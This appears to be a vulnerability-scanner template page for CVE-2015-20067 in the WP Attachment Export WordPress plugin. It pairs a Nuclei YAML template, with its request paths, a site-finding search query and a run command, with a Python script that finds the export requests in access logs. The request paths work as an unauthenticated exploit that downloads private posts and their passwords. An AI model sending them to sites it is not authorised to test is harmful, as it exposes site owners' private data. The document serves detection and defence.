WP Attachment Export < 0.2.4 - Unrestricted File Download
ID: CVE-2015-20067
Severity: high
Author: r3Y3r53
Tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wp_attachment_export_project
Description
The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a WordPress powered site. This includes details of even privately published posts and password-protected posts, with their passwords revealed in plain text.
YAML Source

id: CVE-2015-20067

info:
  name: WP Attachment Export < 0.2.4 - Unrestricted File Download
  author: r3Y3r53
  severity: high
  description: |
    The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.
  remediation: Fixed in 0.2.4
  reference:
    - https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a
    - https://packetstormsecurity.com/files/132693/
    - https://seclists.org/fulldisclosure/2015/Jul/73
    - https://nvd.nist.gov/vuln/detail/CVE-2015-20067
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-20067
    cwe-id: CWE-862
    epss-score: 0.07226
    epss-percentile: 0.93884
    cpe: cpe:2.3:a:wp_attachment_export_project:wp_attachment_export:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wp_attachment_export_project
    product: wp_attachment_export
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/wp-attachment-export/"
  tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wp_attachment_export_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true"
      - "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/xml")'
          - 'contains_all(body, "title","wp:author_id","wp:author_email")'
        condition: and
# digest: 4b0a00483046022100801bd220dbcfffe329ac8176ff2fc90e7d55310a78148567716a957ba2d16607022100cf0ebc6286d1bdf42ce78b44cb101f5480efe327cc04e67e2c7511daa085910c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-20067.yaml"
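
For a site you operate, the web server's access log shows whether the export endpoint in the template's paths has already been requested. The following is an added example, not part of the template or the plugin: it assumes Combined Log Format, and the function name, field names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
EXPORT_PARAM = "wp-attachment-export-download"  # parameter taken from the template's paths


def find_export_requests(lines):
    """Return one dict per request that asked tools.php for the plugin's export."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-admin/tools.php"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        if "true" not in query.get(EXPORT_PARAM, []):
            continue
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "content": query.get("content", [""])[0],
            "bytes": 0 if m["size"] == "-" else int(m["size"]),
            # The template's matcher treats 200 as "export returned". The log
            # cannot show whether the caller was logged in, so review each one.
            "served": m["status"] == "200",
        })
    return hits


# Constructed sample lines (documentation IP ranges), not from a real site.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jul/2015:10:01:02 +0000] "GET /wp-admin/tools.php?content=attachment&wp-attachment-export-download=true HTTP/1.1" 200 48211 "-" "curl/7.43.0"',
    '203.0.113.7 - - [12/Jul/2015:10:01:05 +0000] "GET /wp-admin/tools.php?content=&wp-attachment-export-download=true HTTP/1.1" 200 913422 "-" "curl/7.43.0"',
    '198.51.100.20 - - [12/Jul/2015:10:02:00 +0000] "GET /wp-admin/tools.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Jul/2015:08:00:00 +0000] "GET /blog/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_export_requests(SAMPLE_LOG):
        print(hit)
```

Hits with "served" set to True on a site running a plugin version below 0.2.4 mean the XML was returned, so the post passwords it contains should be changed after upgrading.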